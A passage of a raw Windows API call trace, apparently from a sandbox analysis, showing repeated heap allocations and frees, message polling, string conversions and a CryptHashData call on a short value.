hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0228.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0228.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0228.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0228.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0228.898] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0228.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0228.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0228.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0228.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0228.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0228.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0228.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0228.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0228.898] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0228.898] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0228.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0228.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0228.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0228.899] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0228.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0228.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0228.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0228.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0228.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0228.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0228.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0228.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0228.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0228.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0228.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550f8 [0228.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0228.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0228.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0228.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0228.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0228.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0228.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0228.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0228.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0228.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0228.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0228.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0228.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0228.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0228.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0228.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0228.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0228.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0228.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0228.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0228.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0228.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0228.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0228.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0228.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0228.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0228.900] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0228.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0228.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0228.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0228.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0228.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0228.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0228.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0228.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0228.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0228.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0228.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0228.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0228.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0228.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0228.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0228.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55028 [0228.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0228.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0228.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0228.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0228.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0228.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0228.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0228.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0228.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0228.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0228.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0228.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0228.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0228.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0228.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0228.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0228.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0228.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0228.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0228.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0228.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0228.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0228.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0228.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0228.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0228.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0228.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0228.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0228.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0228.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0228.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0228.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fd8 [0228.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0228.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0228.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0228.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0228.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0228.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0228.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0228.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0228.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0228.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55058 [0228.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0228.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0228.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0228.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0228.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0228.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0228.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0228.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0228.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0228.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0228.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0228.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0228.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0228.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0228.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0228.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0228.903] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0228.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0228.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0228.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0228.904] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0228.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0228.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0228.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0228.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0228.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0228.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0228.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0228.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0228.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0228.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0228.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0228.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0228.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0228.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0228.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0228.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0228.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0228.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0228.904] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0228.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0228.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51400, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0228.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0228.905] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0228.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0228.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.905] CryptHashData (hHash=0xa87050, pbData=0x2e55028, dwDataLen=0x3, dwFlags=0x1) returned 1 [0228.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0228.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.905] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0228.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0228.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514a8 [0228.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0228.906] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0228.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0228.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0228.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0228.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0228.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0228.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0228.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0228.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0228.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0228.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0228.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0228.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0228.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0228.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0228.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0228.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0228.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0228.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0228.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0228.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 